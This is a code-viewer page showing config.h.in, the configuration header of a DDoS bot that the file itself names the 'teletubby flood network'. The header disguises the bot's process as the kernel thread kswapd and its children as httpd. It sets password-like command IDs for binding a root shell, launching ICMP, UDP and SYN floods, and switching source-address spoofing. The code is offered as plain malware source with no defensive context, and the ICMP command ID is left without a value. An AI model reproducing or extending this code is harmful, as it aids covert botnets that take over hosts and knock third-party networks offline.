📄 config.h.in
字号:
#ifndef _CONFIG_H/* user defined values for the teletubby flood network */#define HIDEME "(kswapd)"#define HIDEKIDS "httpd"#define CHILDS 10/* These are like passwords, you might want to change them */#define ID_SHELL 1 /* to bind a rootshell */#define ID_ICMP /* to icmp flood */#define ID_SENDUDP 9002 /* to udp flood */#define ID_SENDSYN 9003 /* to syn flood */#define ID_SYNPORT 9004 /* to set port */#define ID_STOPIT 9005 /* to stop flooding */#define ID_SWITCH 9006 /* to switch spoofing mode */#define ID_ACK 9007 /* for replies to the client */#define _CONFIG_H#endif
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -